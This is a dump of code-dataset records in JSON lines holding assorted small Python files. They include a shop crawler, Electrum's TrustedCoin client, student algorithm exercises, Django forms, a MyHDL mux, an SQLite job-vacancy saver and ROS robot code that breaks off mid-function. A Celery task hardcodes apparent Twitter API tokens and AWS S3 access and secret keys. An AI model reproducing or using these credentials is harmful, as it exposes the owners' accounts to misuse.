data[m.group('error')]=[m.group('msg')]\r\n        else:\r\n            data[m.group('error')].append(m.group('msg'))\r\n\r\nprint (data.keys())\r\n#print data['core:warn']\r\nfor i in data.keys():\r\n    print(i, len(data[i]))\r\n\t\r\nfh.close()\r\n","sub_path":"logparser.py","file_name":"logparser.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515545368","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\n\ndef get_source(url):\n    \"\"\" Return HTML source of requested url\"\"\"\n    try:\n        req = urllib.request.Request(url)\n        with urllib.request.urlopen(req) as response:\n            page_source = response.read()\n        return page_source\n    except:\n        print(\"Error Opening url: %s\" % url)\n\n\ndef get_subcat(site_url):\n    \"\"\" Return list of urls to all subcategories in the site\"\"\"\n    selector = \".w25p.pb10 > a\"  # CSS Selector for Subcategories in page\n    page_source = get_source(site_url)\n\n    # Parse html source DOM\n    html_DOM = BeautifulSoup(page_source, \"html.parser\")\n    # Save all href attributes in a list\n    subcats = [a.get('href') for a in html_DOM.select(selector)]\n\n    return subcats\n\n\ndef get_subcat_pages(subcat_url):\n    \"\"\" Return a url list of subcategory product pages divided by pagination \"\"\"\n    page_source = get_source(subcat_url)\n    html_DOM = BeautifulSoup(page_source, \"html.parser\")\n\n    # CSS Selector for pagination buttons in products page\n    selector = \".paging-wrapper a.paging.paging-color\"\n    pages 
= html_DOM.select(selector)\n\n # Check if there is no pagination\n if not pages:\n return [subcat_url]\n\n # Get the last page index in pagination\n last_page_index = int(pages[-1].get_text())\n\n # Generate URL for paginated products pages\n subcat_pages = [\"%spage.%d/\" % (subcat_url, i) for i in range(1, last_page_index + 1)]\n return subcat_pages\n\n\ndef get_page_items(page_url):\n \"\"\" Return a list of product url\"\"\"\n page_source = get_source(page_url)\n if not page_source: return\n html_DOM = BeautifulSoup(page_source, \"html.parser\")\n\n # CSS Selectors for Item div, title, price, url\n item_selector = \"div.item\"\n item_url_selector = \"a.item-title-text\"\n item_title_selector = \"a.item-title-text\"\n item_price_selector = \"span.item-price\"\n\n # Select all Item divs\n items = html_DOM.select(item_selector)\n\n # Get Title, Price, and URL of the products\n items_detail = [(item.select(item_title_selector)[0].get_text(),\n item.select(item_price_selector)[0].get_text(),\n item.select(item_url_selector)[0].get('href')) for item in items]\n\n return items_detail\n\n\nif __name__ == \"__main__\":\n\n site_url = \"http://meghdadit.com/\"\n output_url = \"./out.txt\"\n\n # Open output file\n out = open(output_url, 'w', encoding='utf-8')\n\n # Get subcategories\n subcats = get_subcat(site_url)\n for subcat in subcats:\n if subcat:\n print(\"*** Crawling Subcategory: %s \\n\" % subcat)\n\n # Get product pages for subcategories\n pages = get_subcat_pages(subcat)\n for page in pages:\n print(\"\\n****** Crawling Product Page: %s \\n\" % page)\n items = get_page_items(page)\n if items:\n\n # Get items in product page\n for title, price, url in items:\n print(\"%s, %s\" % (title, price))\n out.write(\"%s, %s \\n\" % (price, url))\n\n out.close()","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79569575","text":"from .tools import TrustedCoinException, ErrorConnectingServer\n\nfrom electrum.network import Network\nfrom electrum import version, constants\nfrom electrum.logging import Logger\nfrom urllib.parse import urljoin\nfrom aiohttp import ClientResponse\n\n\nclass TrustedCoinCosignerClient(Logger):\n def __init__(self, user_agent=None):\n self.debug = False\n self.user_agent = user_agent\n Logger.__init__(self)\n\n async def handle_response(self, resp: ClientResponse):\n if resp.status != 200:\n try:\n r = await resp.json()\n message = r['message']\n except:\n message = await resp.text()\n\n raise TrustedCoinException(message, resp.status)\n try:\n return await resp.json()\n except:\n return await resp.text()\n\n #\n def send_request(self, method, relative_url, data=None, *, timeout=None, server_address=None):\n network = Network.get_instance()\n if not network:\n raise ErrorConnectingServer('You are offline.')\n url = urljoin(server_address, relative_url)\n if self.debug:\n self.logger.info(f'<-- {method} {url} {data}')\n headers = {}\n if self.user_agent:\n headers['user-agent'] = self.user_agent\n\n try:\n if method == 'get':\n response = Network.send_http_on_proxy(method, url,\n params=data,\n headers=headers,\n on_finish=self.handle_response,\n timeout=timeout)\n elif method == 'post':\n response = Network.send_http_on_proxy(method, url,\n json=data,\n headers=headers,\n on_finish=self.handle_response,\n timeout=timeout)\n else:\n assert False\n except TrustedCoinException:\n raise\n except Exception as e:\n raise 
ErrorConnectingServer(e)\n        else:\n            if self.debug:\n                self.logger.info(f'--> {response}')\n            return response\n\n    def get_terms_of_service(self, server_address=None, billing_plan='electrum-per-tx-otp'):\n        \"\"\"\n        Get the pricing terms of service.\n        :param server_address:\n        :param billing_plan: the plan to return the terms for\n        \"\"\"\n        payload = {'billing_plan': billing_plan, 'is_test': int(constants.net.TESTNET)}\n        return self.send_request('get', 'terms', payload, timeout=600, server_address=server_address)\n\n    def create(self, server_address, xpub1, xpub2, email, type_of_service):\n\n        \"\"\"\n        Create a wallet.\n        :param server_address:\n        :param type_of_service:\n        :param xpub1:\n        :param xpub2:\n        :param email:\n        :return:\n        \"\"\"\n        payload = {\n            'email_address': email,\n            'first_xpub': xpub1,\n            'secondary_xpub': xpub2,\n            'is_test': int(constants.net.TESTNET),\n            'type_of_service': type_of_service\n        }\n\n        return self.send_request('post', 'create_wallet', payload, timeout=600, server_address=server_address)\n\n    def sign(self, server_address, short_id, raw_tx, otp):\n        \"\"\"\n\n        :param server_address:\n        :param short_id:\n        :param raw_tx:\n        :param otp:\n        :return:\n        \"\"\"\n\n        payload = {\n            'short_id': short_id,\n            'raw_tx': raw_tx,\n            'otp': otp,\n            'is_test': int(constants.net.TESTNET)\n\n        }\n        return self.send_request('post', 'sign', payload, timeout=600, server_address=server_address)\n\n    def auth(self, server_address, short_id, otp):\n        \"\"\"\n        Authenticate by checking the OTP code.\n        :param server_address:\n        :param short_id:\n        :param otp:\n        :return:\n        \"\"\"\n        payload = {\n            'short_id': short_id,\n            'otp': otp,\n            'is_test': int(constants.net.TESTNET)\n\n        }\n        return self.send_request('get', 'check_code', payload, timeout=600, server_address=server_address)\n\n    def get_billing(self, server_address, short_id):\n        \"\"\"\n        Get billing information.\n        :param server_address:\n        :param short_id:\n        :return:\n        \"\"\"\n        payload = {\n            'short_id': short_id\n\n        }\n        return self.send_request('get', 'get_billing', payload, timeout=600, server_address=server_address)\n\n\ntc_requests = TrustedCoinCosignerClient(user_agent=\"Electrum/\" + version.ELECTRUM_VERSION)\n","sub_path":"electrum/plugins/tc/tc_requests.py","file_name":"tc_requests.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"554545324","text":"\r\ndef mean(data):\r\n    return sum(data)/len(data)\r\n\r\n\r\ndef median(sample):\r\n    n = len(sample)\r\n    index = n // 2\r\n    if n % 2:\r\n        return sorted(sample)[index]\r\n    return sum(sorted(sample)[index - 1:index + 1]) / 2\r\n\r\n\r\ndef mode(arr):\r\n    counts = []\r\n    for i in arr:\r\n        counts.append(arr.count(i))\r\n    if max(counts) > 1:\r\n        return arr[counts.index(max(counts))]\r\n    return min(arr)\r\n\r\nN = int(input().strip())\r\n\r\narr = [int(i) for i in input().strip().split(' ')]\r\n\r\nm = mean(arr)\r\nprint(m)\r\n\r\np = median(arr)\r\nprint(p)\r\n\r\nr = mode(arr)\r\nprint(r)\r\n","sub_path":"MeanMedianMode.py","file_name":"MeanMedianMode.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"227224859","text":"names = ['kobe' , 'embiid' , 'jordan']\nfor name in names:\n    print( \"Would you like to have dinner with me, 
\" + name + \"?\")\n    \nprint(\"Kobe cannot attend dinner\")\nnames[0] = 'james'\n\n\n\nprint(\"Now I have a bigger restaurant, I'd like to invite more friends\")\nnames.insert(0,'robert')\nnames.insert(2,'george')\nnames.append('michial')\n\nfor name in names:\n    print( \"Would you like to have dinner with me, \" + name + \"?\")\n","sub_path":"python代码及学习笔记/3.list/3.6.py","file_name":"3.6.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"205438621","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 26 14:47:26 2019\n@author: majdoor\n\"\"\"\n\n\n\nclass Node:\n    \n    def __init__(self,data):\n        self.data = data\n        self.next = None\n        self.prv = None\n\nclass CLL:\n    \n    def __init__(self):\n        self.head = None\n    \n    def insertNode(self,data):\n        head = self.head\n        while(head.next!=self.head):\n            head = head.next\n        loc = Node(data)\n        loc.next = self.head\n        loc.prv = self.head.prv\n        head.next = loc\n        self.head.prv = loc\n    \n    def printNode(self):\n        # print every node once, starting from the head\n        head = self.head\n        while True:\n            print(head.data)\n            head = head.next\n            if head == self.head:\n                break\n    \n    def printRvNode(self):\n        # print every node once, walking backwards from the head\n        head = self.head\n        while True:\n            print(head.data)\n            head = head.prv\n            if head == self.head:\n                break\n    \n    def deleteNode(self,data):\n        head = self.head\n        if(head.data == data):\n            # unlink the old head and advance the head pointer\n            head.prv.next = head.next\n            head.next.prv = head.prv\n            self.head = head.next\n        else:\n            head = head.next\n            while(head != self.head):\n                if(head.data == data):\n                    head.prv.next = head.next\n                    head.next.prv = head.prv\n                    break\n                head = head.next\n    \n    \nif __name__ == \"__main__\":\n    node = Node(1)\n    cll = CLL()\n    node.next = node\n    node.prv = node\n    cll.head = node\n    for i in range(0,10):\n        cll.insertNode(i)\n    cll.deleteNode(2)\n    cll.printNode()\n    \n    \n    ","sub_path":"linked-list/circularLinkedList.py","file_name":"circularLinkedList.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162771769","text":"# filename is f. + number 1 to 10000 (or better way list of all file in directory)\n\n# import directory functions so this works on any operating system \nfrom os import listdir \nfrom os.path import isfile\n\n# import regex\nimport re \n\n# truncate the OUTPUT file so it starts fresh before processing\noutputfile = open('OUTPUT', 'w')\noutputfile.close()\n\n# store matching file names in a list \nfiles = []\n\n# describe file pattern\nfile_pattern = re.compile(\"^f\\.[1-9][0-9]*\")\n\n# list all files in this directory to check\nfor f in listdir():\n\n# check isfile and compare with file pattern\n    if(isfile(f) and file_pattern.match(f)):\n        files.append(f)\n\n# sort file names numerically\nfiles.sort(key=lambda text: int(text.split('.')[1]))\n\n# read the file\nfor filename in files:\n\n# open file name by name\n    file = open(filename, 'r') \n    \n# initialize flag for checking Oxygen is read\n    O_isRead = {} \n    O_isRead['O1'] = False\n    O_isRead['O2'] = False\n    \n# initialize storage of coordinates of Oxygen\n    coordinate_x = {}\n    coordinate_y = {}\n    coordinate_z = {}\n    \n# split the name of file by . and get time sequence number\n    time_seq = filename.split('.')[-1]\n    \n# read file line by line \n    lines = file.readlines()\n    \n# finished reading. close file\n    file.close()\n    \n# read from the bottom by reversing the list of lines, because oxygen atoms generally appear in the bottom lines \n    lines.reverse()\n    \n# separate each paragraph with space to substring\n    for line in lines:\n        substr = line.split()\n        \n# if O1 and O2 in this file are read, 
skip the rest of this file\n        if(O_isRead['O1'] and O_isRead['O2']):\n            break\n        \n# check if the line should start with 'ATOM'\n        if(substr[0] == 'ATOM'):\n            \n# use a regex to check which atom is on this line, looking for O1 and O2\n            O1_2_pattern = re.compile('O[1-2]')\n            if(bool(O1_2_pattern.match(substr[2]))):\n                \n# store the coordinates of the oxygen that was found\n                coordinate_x[substr[2]] = substr[5]\n                coordinate_y[substr[2]] = substr[6]\n                coordinate_z[substr[2]] = substr[7]\n                \n# mark this oxygen atom as read \n                O_isRead[substr[2]] = True\n                \n# write to the text file, opened in append mode \n# open text file \n    outputfile = open('OUTPUT', 'a')\n    \n# write name(time sequence number), O atom(1 or 2), coordinates(x, y, z)\n# write O1 and O2\n    for i in ['1','2']:\n        data_towrite = time_seq + '\\tO' + i + '\\t' \\\n                     + coordinate_x['O' + i] + '\\t' \\\n                     + coordinate_y['O' + i] + '\\t' \\\n                     + coordinate_z['O' + i] + '\\t\\n'\n        outputfile.write(data_towrite) \n        \n# print the record that is currently being written \n        print('step ' + data_towrite[:-1])\n    \n# close the output file; the O1 and O2 flags are re-initialized for the next file\n    outputfile.close()\n    \n# loop it, read the new file","sub_path":"extractoxygen.py","file_name":"extractoxygen.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"530207560","text":"# WAP to find the sum of digits of a number\n\nn = int(input(\"Enter the given number\"))\n\ntotal = 0\n\nwhile(n>0):\n    dig = n%10\n    total=total+dig\n    n=n//10\n\nprint(\"the total sum of digits:\",total)","sub_path":"NareshExamples/SumOfDigits.py","file_name":"SumOfDigits.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"41956463","text":"################EXTERNAL LIBRARY IMPORTS################\nfrom celery import Celery\nimport tweepy\nfrom tweepy import api\nimport ast\nimport json\nimport signal\nimport string\nimport sys\nimport time\nimport boto\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\n\n########################################################\n\napp = Celery()\napp.config_from_object(\"celery_settings\")\n\n# signal and sys are needed by this SIGTERM handler\ndef handler(signum, frame):\n    sys.exit(1)\n\n@app.task\ndef hello(): \n    signal.signal(signal.SIGTERM, handler)\n    \n    # Authentication details. 
To obtain these visit dev.twitter.com\n    consumer_key = '4DKCMVCkPWZW2MxUjz7aERJ4Q'\n    consumer_secret = 'XKUjNbLDfbBbumSbcAhxvx55W2AQp4sufFqUoWYMHwmKIOMsum'\n    access_token = '271096886-DF5s6ZpjzWUN0Ibf6Sf8wUyM9QhMkBMSGAh7mRnm'\n    access_token_secret = 'WoIYrEZeDxiiAZfqrgzJDuYbL1c6bs6ooa8eVX42AA6tq'\n    \n    follower_array = []\n    \n    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n    auth.set_access_token(access_token, access_token_secret)\n    \n    conn = S3Connection('AKIAJW4YOLS4PHPK5CLQ', 'JUPbDU2QXJQT24Z075gthokQs9sgnh79OoHKmr7d')\n    mybucket = \"ddbucketsfe\"\n    ddbucketsfe = conn.get_bucket(mybucket)\t\n    b = conn.get_bucket(ddbucketsfe) # substitute your bucket name here\n    k = Key(b)\n    k.key = 'twitter_followers'\n    \n    api = tweepy.API(auth,wait_on_rate_limit=True)\n    while True:\n        temp = api.followers(screen_name = '@DeloitteDIGI_SA',count=20)\n        for user in temp:\n            if user.screen_name.encode('utf-8') not in follower_array:\n                follower_array.append(user.screen_name.encode('utf-8'))\n        k.set_contents_from_string(str(follower_array))\n        time.sleep (60)\n        \n        \n\n\n\n\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"129550199","text":"import time\r\n\r\ndef montaMatriz(vet,c):\r\n\r\n\r\n    mat = [[0 for col in range(c+1)] for lin in range(len(vet))]\r\n    for indicelin, linha in enumerate(mat):\r\n        for indicecol, coluna in enumerate(linha):\r\n            #fill the first column with true (a sum of 0 is always reachable)\r\n            linha[0]=1\r\n            #the first row is a special case\r\n            if indicelin==0:\r\n                if indicecol==vet[indicelin]:\r\n                    mat[indicelin][indicecol]=1\r\n            #from the second row on:\r\n            else:\r\n                if indicecol < vet[indicelin]:\r\n                    mat[indicelin][indicecol]=mat[indicelin-1][indicecol]\r\n                else:\r\n                    #if the cell above is true, this cell is also true\r\n                    if mat[indicelin-1][indicecol] == 1:\r\n                        mat[indicelin][indicecol] = 1\r\n                    else:\r\n                        #if the cell above is false, go one row up and step back by this row's value\r\n                        mat[indicelin][indicecol] = mat[indicelin-1][indicecol - vet[indicelin]]\r\n\r\n    for i in mat:\r\n        print(i, \"\\n\")\r\n    return mat\r\n\r\ndef achaCombinacao(mat,v,c):\r\n    aux=0\r\n    # after the loops, aux holds the bottom-right cell, i.e. whether the sum c is reachable\r\n    for linha,i in enumerate(mat):\r\n        for coluna, j in enumerate(i):\r\n            if mat[linha][coluna]==1:\r\n                aux=1\r\n            else:\r\n                aux=0\r\n\r\n    if aux==1:\r\n        print(\"There is a subset\")\r\n    else:\r\n        print('There is no subset')\r\ninicio2 = time.time()\r\nv=[2,3,5,7,10,15]\r\nc=17\r\nmat = montaMatriz(v,c)\r\nachaCombinacao(mat,v,c)\r\nfim2 = time.time()\r\nprint(\"Dynamic programming time:\", fim2-inicio2)\r\n","sub_path":"2020_1/analise_de_algoritmo/correcaoa1/matheus_jesus/AnaliseDeAlgoritmo/subsetsum_progamacao_dinamica.py","file_name":"subsetsum_progamacao_dinamica.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"260133240","text":"\"\"\" Compiled: 2020-09-18 10:38:52 \"\"\"\n\n#__src_file__ = \"extensions/IntegratedWorkbench/./etc/FViewCallbacks.py\"\n\"\"\"-------------------------------------------------------------------------------------------------------\nMODULE\n    FViewCallbacks\n\n    (c) Copyright 2014 SunGard FRONT ARENA. 
All rights reserved.\n\nDESCRIPTION\n FUiEventCallback functions for views.\n-------------------------------------------------------------------------------------------------------\"\"\"\nimport FIntegratedWorkbench\nimport ViewLauncher\nimport acm\n\nfrom FIntegratedWorkbenchLogging import creationLogger\nfrom FPanelCreator import PanelCreator\nfrom FViewCreator import GetPanels\nfrom FViewUtils import ViewParameterSettings\n\nVIEW_KEY = 'integratedWorkbenchView'\n\n\ndef OnFrameCreate(eii):\n application = eii.ExtensionObject()\n RegisterViewPanels(application)\n\ndef OnSavingWorkbook(eii):\n workbook = eii.ExtensionObject().StoredWorkbook()\n frame = eii.Parameter('Frame')\n view = FIntegratedWorkbench.GetView(frame)\n if view:\n workbook.ToArchive(VIEW_KEY, view.Name())\n\ndef OnWorkbookCreate(eii):\n\n def ViewName(workbook):\n viewName = workbook.FromArchive(VIEW_KEY)\n if viewName is None:\n # backwards compatibility\n viewName = ViewNameFromAddInfo(workbook)\n return viewName\n\n def ViewNameFromAddInfo(workbook):\n try:\n return workbook.AdditionalInfo().View()\n except Exception:\n return None\n\n workbook = eii.ExtensionObject().StoredSourceWorkbook()\n if workbook is not None:\n viewName = ViewName(workbook)\n if viewName is not None:\n frame = eii.Parameter('Frame')\n ViewLauncher.LaunchViewFromExistingApplication(viewName, frame)\n\ndef RegisterViewPanels(application):\n for settings in GetViewPanels(application):\n RegisterPanel(settings, application)\n\ndef RegisterPanel(settings, application):\n try:\n creator = PanelCreator.FromSettings(None, settings)\n createFunction = creator.CreateFunction() \n createFunctionName = ''.join((settings.Name(), 'CreationFunction'))\n application.RegisterDockWindowType(settings.Name(), '.'.join((__name__, createFunctionName)))\n setattr(__import__(__name__), createFunctionName, createFunction)\n except Exception as e:\n creationLogger.debug('Error while trying to register panel on view: %s', e)\n\ndef GetViewPanels(application):\n for settings in ViewParameterSettings():\n if application.Name() == settings.Application():\n for panel in GetPanels(settings):\n yield panel","sub_path":"Extensions/_integrated_workbench_py/FPythonCode/FViewCallbacks.py","file_name":"FViewCallbacks.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"208967390","text":"from myhdl import block, always_comb, Signal\n\n@block\ndef mux(z, a, b, sel):\n\n \"\"\" Multiplexer.\n\n z -- mux output\n a, b -- data inputs\n sel -- control input: select a if asserted, otherwise b\n\n \"\"\"\n\n @always_comb\n def comb():\n # we could build it with gates\n # logic is z = sel & a | (~ sel) & b\n if sel == 1:\n z.next = a\n else:\n z.next = b\n\n return comb\n\n\nif __name__ == \"__main__\":\n from myhdl import intbv, delay, instance\n @block\n def test_mux():\n\n # create signals\n z, a, b, sel = [Signal(intbv(0)) for i in range(4)]\n\n # instantiating a block\n mux_1 = mux(z, a, b, sel)\n\n @instance\n def stimulus():\n print(\"z a b sel\")\n for i in range(10):\n a.next, b.next, sel.next = (i & 1), ((i >> 1) & 1), ((i >> 2) & 1)\n yield delay(10)\n print(\"%s %s %s %s\" % (z, a, b, sel))\n\n return mux_1, stimulus\n\n tb = test_mux()\n tb.config_sim(trace=True)\n tb.run_sim()\n","sub_path":"digital-logic/myhdl/mux.py","file_name":"mux.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"396319218","text":"import sqlite3\nimport sys\nimport os\nimport traceback\n\nfrom tqdm import tqdm\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom ..vacancies import get_vacancy\nfrom ..constants import DB_FILE_PATH\nfrom ..constants import SHEMA_FILE_PATH\nfrom ..constants import INSERT_FILE_PATH\nfrom ..constants import DOWNLOADING_VACANCIES_MSG\n\n\ndef create_db(db_file=DB_FILE_PATH):\n \"\"\"\n Creates a SQLite database.\n \"\"\"\n try:\n with sqlite3.connect(db_file) as db:\n with open(SHEMA_FILE_PATH, 'r') as f, closing(db.cursor()) as cur:\n cur.executescript(f.read())\n return True\n except sqlite3.Error as err:\n print(err, file=sys.stderr)\n traceback.print_stack()\n except IOError as err:\n print(err, file=sys.stderr)\n return False\n\n\ndef save_vacancy(vacancy, connection_obj):\n \"\"\"\n Saves a vacancy to the SQLite database.\n \"\"\"\n try:\n with open(INSERT_FILE_PATH, 'r') as f, closing(connection_obj.cursor()) as cur:\n # saving area\n cur.execute(f.readline(),\n (int(vacancy['area']['id']),\n vacancy['area']['url'],\n vacancy['area']['name']))\n # saving salary\n cur.execute(f.readline(),\n (vacancy['salary']['from'],\n vacancy['salary']['to'],\n vacancy['salary']['currency'],\n vacancy['salary']['gross']))\n cur.execute(f.readline())\n salaryID = cur.fetchone()[0]\n # saving employer\n cur.execute(f.readline(),\n (vacancy['employer'].get('id', 'NULL'),\n vacancy['employer']['name'],\n vacancy['employer'].get('url', 'NULL'),\n vacancy['employer'].get('alternate_url', 'NULL'),\n vacancy['employer'].get('trusted', 'NULL'),\n vacancy['employer'].get('blacklisted', 'NULL')))\n cur.execute(f.readline())\n employerID = cur.fetchone()[0]\n # saving vacancy\n cur.execute(f.readline(),\n (int(vacancy['id']),\n vacancy['name'],\n vacancy['description'],\n vacancy['published_at'],\n int(vacancy['area']['id']),\n salaryID,\n employerID))\n connection_obj.commit()\n except IOError as err:\n print(err, file=sys.stderr)\n\n\ndef vacancies_to_db(id_list, db_file=DB_FILE_PATH, recreate=False):\n \"\"\"\n Saves vacancies which IDs are transferred in the list\n to the SQLite database.\n \"\"\"\n if recreate or not os.path.exists(db_file):\n create_db(db_file)\n try:\n with sqlite3.connect(db_file) as db:\n print(DOWNLOADING_VACANCIES_MSG)\n for vac_id in tqdm(id_list):\n vac = get_vacancy(vac_id)\n save_vacancy(vac, db)\n return True\n except RequestException as err:\n print(err, file=sys.stderr)\n except sqlite3.Error as err:\n print(err, file=sys.stderr)\n traceback.print_stack()\n return False\n","sub_path":"lab2/hhVacancies/sql/vacancies_sql.py","file_name":"vacancies_sql.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36766773","text":"from django import forms\nimport numpy as np\nimport pandas as pd\n\nclass FeedbackForm(forms.Form):\n name = forms.CharField(\n label=\"\",\n widget= forms.TextInput(\n attrs={\n \"class\":\"form-control\",\n \"placeholder\" : \"Enter Name\"\n }\n )\n )\n email = forms.EmailField(\n label=\"\",\n widget=forms.EmailInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"Enter Email\"\n }\n )\n )\n contact = forms.IntegerField(\n label=\"\",\n widget=forms.NumberInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"Enter Contact\"\n }\n )\n )\n feedback = forms.CharField(\n label=\"\",\n widget= forms.Textarea(\n attrs={\n \"class\" : \"form-control\",\n \"placeholder\" : 
\"Your Feedback\"\n            }\n        )\n    )\nclass PredictionForm(forms.Form):\n    data = pd.read_csv(r'E:\Major project\AgriYieldPredict\static\datasets\district_UP.csv')\n    x = data.iloc[ :,:].values\n    AREA_CHOICE = (('Select','Select Area'),)\n    for i in x:\n        AREA_CHOICE = AREA_CHOICE+(tuple(i),)\n    area = forms.ChoiceField(\n        widget=forms.Select(\n            attrs={\n                'class' : 'form-control'\n            }\n        ),\n        choices = AREA_CHOICE,\n        label=\"\"\n    )\n    data2 = pd.read_csv(r'E:\Major project\AgriYieldPredict\static\datasets\months.csv')\n    MONTH_CHOICE = (('Select', 'Select Month'),)\n    y = data2.iloc[:,:].values\n    for j in y:\n        MONTH_CHOICE = MONTH_CHOICE+(tuple(j),)\n    month = forms.ChoiceField(\n        widget=forms.Select(\n            attrs={\n                'class' : 'form-control'\n            }\n        ),\n        choices = MONTH_CHOICE,\n        label=\"\"\n    )\n    data3 = pd.read_csv(r'E:\Major project\AgriYieldPredict\static\datasets\soil.csv')\n    SOIL_CHOICE = (('Select', 'Select Soil Type'),)\n    z = data3.iloc[:, :].values\n    for k in z:\n        SOIL_CHOICE = SOIL_CHOICE + (tuple(k),)\n    soil = forms.ChoiceField(\n        widget=forms.Select(\n            attrs={\n                'class': 'form-control'\n            }\n        ),\n        choices=SOIL_CHOICE,\n        label=\"\"\n    )\n","sub_path":"AgriYieldPredict/YieldPridict/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375580129","text":"#!/usr/bin/env python\nimport threading\n\nimport rospy\nfrom std_msgs.msg import Float64MultiArray\nfrom std_msgs.msg import UInt16MultiArray\nfrom std_msgs.msg import UInt16\n\nimport time\n\nfinishBayDirection = 0\nright_direction = 116\nleft_direction = 225\nir_right = 0\nir_left = 0\ncurrentDirection = 0\nultRight = 0\nultLeft = 0\ncurrentIrRight = 0\ncurrentIrLeft = 0\nservoAngle = 0\ntraveledDistance = 0\nseq = 0\nservo_status = 1\n\ndef logDirection(data):\n    # rospy.loginfo(data)\n    global finishBayDirection\n    global currentDirection\n    if finishBayDirection == 0:\n        finishBayDirection = data.data\n    currentDirection = data.data\n\n\ndef logUltServo(data):\n    # rospy.loginfo(data)\n    global ultRight\n    global ultLeft\n    global servoAngle\n    ultRight = data.data[0]\n    ultLeft = data.data[1]\n    servoAngle = data.data[2]\n    # avoid_ob()\n\n\ndef logIr(data):\n    # rospy.loginfo(data)\n    # reference global vars\n    global ir_right\n    global ir_left\n    # check if the init values have been registered\n    if ir_right == 0:\n        ir_right = data.data[0]\n        print(ir_right)\n    if ir_left == 0:\n        ir_left = data.data[1]\n        print(ir_left)\n    # reference temp global vars then update values\n    global currentIrRight\n    currentIrRight = data.data[0]\n    global currentIrLeft\n    currentIrLeft = data.data[1]\n    # avoid_drop()\n\n\ndef avoid_ob():\n    # steer around obstacles based on the ultrasonic readings and the servo angle\n    global ultRight\n    global ultLeft\n    global servoAngle\n    pub = rospy.Publisher('/cmd_vel_action', UInt16MultiArray, queue_size=10)\n    rate = rospy.Rate(3) # 3hz\n    action_msg = UInt16MultiArray()\n    if ultRight <= 30 or ultLeft <= 30:\n        if servoAngle == 40:\n            action_msg.data = [0, 1]\n            rospy.loginfo(action_msg)\n            pub.publish(action_msg)\n            time.sleep(1)\n            action_msg.data = [0, 4]\n            rospy.loginfo(action_msg)\n            pub.publish(action_msg)\n            time.sleep(1)\n            action_msg.data = [60, 2]\n            rospy.loginfo(action_msg)\n            pub.publish(action_msg)\n            time.sleep(1)\n            # avoid obstacle from the right\n            # turn left\n            # then right\n            # try to go straight\n            servoAngle = 60\n        elif servoAngle == 60:\n            # avoid obstacle straight\n            servoAngle = 0\n        elif servoAngle == 90:\n            action_msg.data = [140, 2]\n            rospy.loginfo(action_msg)\n            
pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [140, 4]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 1]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n servoAngle = 60\n rate.sleep()\n\n global servo_status\n if servo_status == 1:\n action_msg.data = [40, 4]\n servo_status = 2\n elif servo_status == 2:\n action_msg.data = [60, 4]\n servo_status = 3\n elif servo_status == 3:\n action_msg.data = [90, 4]\n servo_status = 4\n elif servo_status == 4:\n action_msg.data = [60, 4]\n servo_status = 1\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n\n\ndef avoid_drop():\n global ir_right\n global ir_left\n global currentIrRight\n global currentIrLeft\n global currentDirection\n global left_direction\n global right_direction\n left_direction = 116\n right_direction = 225\n # publisher code\n pub = rospy.Publisher('/cmd_vel_action', UInt16MultiArray, queue_size=10)\n rate = rospy.Rate(3) # 10hz\n action_msg = UInt16MultiArray()\n while not rospy.is_shutdown():\n if currentIrRight > ir_right + 10 and currentIrLeft < ir_left + 10:\n\n # publish turn left\n action_msg.data = [60, 5]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 3]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 1]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 4]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 2]\n 